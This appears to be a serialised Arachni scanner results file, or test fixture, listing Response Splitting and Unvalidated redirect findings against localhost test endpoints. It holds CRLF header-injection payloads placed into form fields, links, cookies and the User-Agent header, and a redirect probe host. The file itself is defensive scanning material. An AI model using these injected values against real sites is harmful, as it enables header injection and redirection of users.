verification: false
references:
SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:param_flip: true
:follow_location: false
:injected_orig: ! "\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:
no"
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": ! "default\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:
no"
:injected: !binary |-
ZGVmYXVsdCUwRCUwQVgtQ1JMRi1TYWZlLTk1ZjlmOGYwOGY2ZjM3OTI0MmQ3
YWRhODZjYWUxOTY4NWNhMzhlNWYzZTQyMjhkN2JjZDI0NTc1OGQ1YjljNTk6
JTIwbm8=
:combo:
!binary "aW5wdXQ=": ! "default\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:
no"
:action: http://localhost:10519/form/append
:regexp: ''
var: input
url: http://localhost:10519/form/append
injected: default%0D%0AX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:%20no
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
? !binary |-
WC1DcmxmLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1
Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
: !binary |-
bm8=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTo1MyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Response Splitting
description: ! "The web application includes user input\n in the response
HTTP header."
tags:
- response
- splitting
- injection
- header
cwe: '20'
cwe_url: http://cwe.mitre.org/data/definitions/20.html
severity: Medium
cvssv2: '5.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included as part of the HTTP response headers."
remedy_code: ''
mod_name: Response Splitting
variations: []
internal_modname: ResponseSplitting
internal_modname: ResponseSplitting
- !ruby/object:Arachni::Issue
verification: false
references:
SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
var: input
url: http://localhost:10519/link/straight?input=default
elem: link
method: GET
name: Response Splitting
description: ! "The web application includes user input\n in the response HTTP
header."
tags:
- response
- splitting
- injection
- header
cwe: '20'
cwe_url: http://cwe.mitre.org/data/definitions/20.html
severity: Medium
cvssv2: '5.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included as part of the HTTP response headers."
remedy_code: ''
mod_name: Response Splitting
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:param_flip: true
:follow_location: false
:injected_orig: ! "\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:
no"
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": !binary |-
DQpYLUNSTEYtU2FmZS05NWY5ZjhmMDhmNmYzNzkyNDJkN2FkYTg2Y2FlMTk2
ODVjYTM4ZTVmM2U0MjI4ZDdiY2QyNDU3NThkNWI5YzU5OiBubwA=
:injected: !binary |-
JTBEJTBBWC1DUkxGLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNh
ZTE5Njg1Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OTolMjBubyUw
MA==
:combo:
!binary "aW5wdXQ=": !binary |-
DQpYLUNSTEYtU2FmZS05NWY5ZjhmMDhmNmYzNzkyNDJkN2FkYTg2Y2FlMTk2
ODVjYTM4ZTVmM2U0MjI4ZDdiY2QyNDU3NThkNWI5YzU5OiBubwA=
:action: http://localhost:10519/link/straight?input=default
:regexp: ''
var: input
url: http://localhost:10519/link/straight?input=default
injected: ! '%0D%0AX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:%20no%00'
id:
regexp: ''
regexp_match:
elem: link
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
? !binary |-
WC1DcmxmLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1
Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
: !binary |-
bm8=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTo1NCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Response Splitting
description: ! "The web application includes user input\n in the response
HTTP header."
tags:
- response
- splitting
- injection
- header
cwe: '20'
cwe_url: http://cwe.mitre.org/data/definitions/20.html
severity: Medium
cvssv2: '5.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included as part of the HTTP response headers."
remedy_code: ''
mod_name: Response Splitting
variations: []
internal_modname: ResponseSplitting
internal_modname: ResponseSplitting
- !ruby/object:Arachni::Issue
verification: false
references:
SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
var: input
url: http://localhost:10519/link/append?input=default
elem: link
method: GET
name: Response Splitting
description: ! "The web application includes user input\n in the response HTTP
header."
tags:
- response
- splitting
- injection
- header
cwe: '20'
cwe_url: http://cwe.mitre.org/data/definitions/20.html
severity: Medium
cvssv2: '5.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included as part of the HTTP response headers."
remedy_code: ''
mod_name: Response Splitting
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:param_flip: true
:follow_location: false
:injected_orig: ! "\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:
no"
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": ! "default\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:
no"
:injected: !binary |-
ZGVmYXVsdCUwRCUwQVgtQ1JMRi1TYWZlLTk1ZjlmOGYwOGY2ZjM3OTI0MmQ3
YWRhODZjYWUxOTY4NWNhMzhlNWYzZTQyMjhkN2JjZDI0NTc1OGQ1YjljNTk6
JTIwbm8=
:combo:
!binary "aW5wdXQ=": ! "default\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:
no"
:action: http://localhost:10519/link/append?input=default
:regexp: ''
var: input
url: http://localhost:10519/link/append?input=default
injected: default%0D%0AX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:%20no
id:
regexp: ''
regexp_match:
elem: link
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
? !binary |-
WC1DcmxmLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1
Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
: !binary |-
bm8=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTo1NCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Response Splitting
description: ! "The web application includes user input\n in the response
HTTP header."
tags:
- response
- splitting
- injection
- header
cwe: '20'
cwe_url: http://cwe.mitre.org/data/definitions/20.html
severity: Medium
cvssv2: '5.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included as part of the HTTP response headers."
remedy_code: ''
mod_name: Response Splitting
variations: []
internal_modname: ResponseSplitting
internal_modname: ResponseSplitting
- !ruby/object:Arachni::Issue
verification: false
references:
SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
var: cookie2
url: http://localhost:10519/cookie/append
elem: cookie
method: GET
name: Response Splitting
description: ! "The web application includes user input\n in the response HTTP
header."
tags:
- response
- splitting
- injection
- header
cwe: '20'
cwe_url: http://cwe.mitre.org/data/definitions/20.html
severity: Medium
cvssv2: '5.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included as part of the HTTP response headers."
remedy_code: ''
mod_name: Response Splitting
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:follow_location: false
:injected_orig: ! "\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:
no"
:altered: !binary |-
Y29va2llMg==
:element: cookie
:params: {}
:cookies:
!binary "Y29va2llMg==": ! "cookie value\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:
no"
:injected: !binary |-
Y29va2llJTIwdmFsdWUlMEQlMEFYLUNSTEYtU2FmZS05NWY5ZjhmMDhmNmYz
NzkyNDJkN2FkYTg2Y2FlMTk2ODVjYTM4ZTVmM2U0MjI4ZDdiY2QyNDU3NThk
NWI5YzU5OiUyMG5v
:combo:
!binary "Y29va2llMg==": ! "cookie value\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:
no"
:action: http://localhost:10519/cookie/append
:regexp: ''
var: cookie2
url: http://localhost:10519/cookie/append
injected: cookie%20value%0D%0AX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:%20no
id:
regexp: ''
regexp_match:
elem: cookie
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value%0D%0AX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:+no;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
? !binary |-
WC1DcmxmLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1
Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
: !binary |-
bm8=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTo1NiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Response Splitting
description: ! "The web application includes user input\n in the response
HTTP header."
tags:
- response
- splitting
- injection
- header
cwe: '20'
cwe_url: http://cwe.mitre.org/data/definitions/20.html
severity: Medium
cvssv2: '5.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included as part of the HTTP response headers."
remedy_code: ''
mod_name: Response Splitting
variations: []
internal_modname: ResponseSplitting
internal_modname: ResponseSplitting
- !ruby/object:Arachni::Issue
verification: false
references:
SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
var: cookie
url: http://localhost:10519/cookie/straight
elem: cookie
method: GET
name: Response Splitting
description: ! "The web application includes user input\n in the response HTTP
header."
tags:
- response
- splitting
- injection
- header
cwe: '20'
cwe_url: http://cwe.mitre.org/data/definitions/20.html
severity: Medium
cvssv2: '5.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included as part of the HTTP response headers."
remedy_code: ''
mod_name: Response Splitting
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:follow_location: false
:injected_orig: ! "\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:
no"
:altered: !binary |-
Y29va2ll
:element: cookie
:params: {}
:cookies:
!binary "Y29va2ll": ! "\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:
no"
:injected: !binary |-
JTBEJTBBWC1DUkxGLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNh
ZTE5Njg1Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OTolMjBubw==
:combo:
!binary "Y29va2ll": ! "\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:
no"
:action: http://localhost:10519/cookie/straight
:regexp: ''
var: cookie
url: http://localhost:10519/cookie/straight
injected: ! '%0D%0AX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:%20no'
id:
regexp: ''
regexp_match:
elem: cookie
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=%0D%0AX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:+no
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
? !binary |-
WC1DcmxmLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1
Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
: !binary |-
bm8=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTo1NiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Response Splitting
description: ! "The web application includes user input\n in the response
HTTP header."
tags:
- response
- splitting
- injection
- header
cwe: '20'
cwe_url: http://cwe.mitre.org/data/definitions/20.html
severity: Medium
cvssv2: '5.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included as part of the HTTP response headers."
remedy_code: ''
mod_name: Response Splitting
variations: []
internal_modname: ResponseSplitting
internal_modname: ResponseSplitting
- !ruby/object:Arachni::Issue
verification: false
references:
SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
var: User-Agent
url: http://localhost:10519/header/append
elem: header
method: GET
name: Response Splitting
description: ! "The web application includes user input\n in the response HTTP
header."
tags:
- response
- splitting
- injection
- header
cwe: '20'
cwe_url: http://cwe.mitre.org/data/definitions/20.html
severity: Medium
cvssv2: '5.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included as part of the HTTP response headers."
remedy_code: ''
mod_name: Response Splitting
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:follow_location: false
:injected_orig: ! "\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:
no"
:altered: User-Agent
:element: header
:params:
:headers:
User-Agent: ! "arachni_user\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:
no"
:injected: !binary |-
YXJhY2huaV91c2VyJTBEJTBBWC1DUkxGLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5
MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDVi
OWM1OTolMjBubw==
:combo:
User-Agent: ! "arachni_user\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:
no"
:action: http://localhost:10519/header/append
:regexp: ''
var: User-Agent
url: http://localhost:10519/header/append
injected: arachni_user%0D%0AX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:%20no
id:
regexp: ''
regexp_match:
elem: header
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: ! 'arachni_user%0D%0AX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:
no'
Cookie: cookie=cookie+value;cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
? !binary |-
WC1DcmxmLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1
Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
: !binary |-
bm8=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTo1OCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Response Splitting
description: ! "The web application includes user input\n in the response
HTTP header."
tags:
- response
- splitting
- injection
- header
cwe: '20'
cwe_url: http://cwe.mitre.org/data/definitions/20.html
severity: Medium
cvssv2: '5.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included as part of the HTTP response headers."
remedy_code: ''
mod_name: Response Splitting
variations: []
internal_modname: ResponseSplitting
internal_modname: ResponseSplitting
- !ruby/object:Arachni::Issue
verification: false
references:
SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
var: User-Agent
url: http://localhost:10519/header/straight
elem: header
method: GET
name: Response Splitting
description: ! "The web application includes user input\n in the response HTTP
header."
tags:
- response
- splitting
- injection
- header
cwe: '20'
cwe_url: http://cwe.mitre.org/data/definitions/20.html
severity: Medium
cvssv2: '5.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included as part of the HTTP response headers."
remedy_code: ''
mod_name: Response Splitting
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:follow_location: false
:injected_orig: ! "\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:
no"
:altered: User-Agent
:element: header
:params:
:headers:
User-Agent: ! "\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:
no"
:injected: !binary |-
JTBEJTBBWC1DUkxGLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNh
ZTE5Njg1Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OTolMjBubw==
:combo:
User-Agent: ! "\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:
no"
:action: http://localhost:10519/header/straight
:regexp: ''
var: User-Agent
url: http://localhost:10519/header/straight
injected: ! '%0D%0AX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:%20no'
id:
regexp: ''
regexp_match:
elem: header
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: ! '%0D%0AX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:
no'
Cookie: cookie=cookie+value;cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
? !binary |-
WC1DcmxmLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1
Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
: !binary |-
bm8=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTo1OSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Response Splitting
description: ! "The web application includes user input\n in the response
HTTP header."
tags:
- response
- splitting
- injection
- header
cwe: '20'
cwe_url: http://cwe.mitre.org/data/definitions/20.html
severity: Medium
cvssv2: '5.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included as part of the HTTP response headers."
remedy_code: ''
mod_name: Response Splitting
variations: []
internal_modname: ResponseSplitting
internal_modname: ResponseSplitting
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
var: input
url: http://localhost:7027/form/straight
elem: form
method: GET
name: Unvalidated redirect
description: The web application redirects users to unvalidated URLs.
tags:
- unvalidated
- redirect
- injection
- header
- location
cwe: '819'
cwe_url: http://cwe.mitre.org/data/definitions/819.html
severity: Medium
remedy_guidance: ! "Server side verification should be employed\n to
ensure that the redirect destination is the one intended."
mod_name: Unvalidated redirect
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:injected_orig: www.arachni-boogie-woogie.com
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": !binary |-
d3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A
:follow_location: true
:injected: !binary |-
d3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A
:combo:
!binary "aW5wdXQ=": !binary |-
d3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A
:action: http://localhost:7027/form/straight
:regexp: ''
var: input
url: http://localhost:7027/form/straight
injected: !binary |-
d3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "TG9jYXRpb24=": !binary |-
aHR0cDovL3d3dy5hcmFjaG5pLWJvb2dpZS13b29naWUuY29t
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjozMiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Unvalidated redirect
description: The web application redirects users to unvalidated URLs.
tags:
- unvalidated
- redirect
- injection
- header
- location
cwe: '819'
cwe_url: http://cwe.mitre.org/data/definitions/819.html
severity: Medium
remedy_guidance: ! "Server side verification should be employed\n to
ensure that the redirect destination is the one intended."
mod_name: Unvalidated redirect
variations: []
internal_modname: UnvalidatedRedirect
internal_modname: UnvalidatedRedirect
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
var: input
url: http://localhost:7027/form/append
elem: form
method: GET
name: Unvalidated redirect
description: The web application redirects users to unvalidated URLs.
tags:
- unvalidated
- redirect
- injection
- header
- location
cwe: '819'
cwe_url: http://cwe.mitre.org/data/definitions/819.html
severity: Medium
remedy_guidance: ! "Server side verification should be employed\n to
ensure that the redirect destination is the one intended."
mod_name: Unvalidated redirect
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
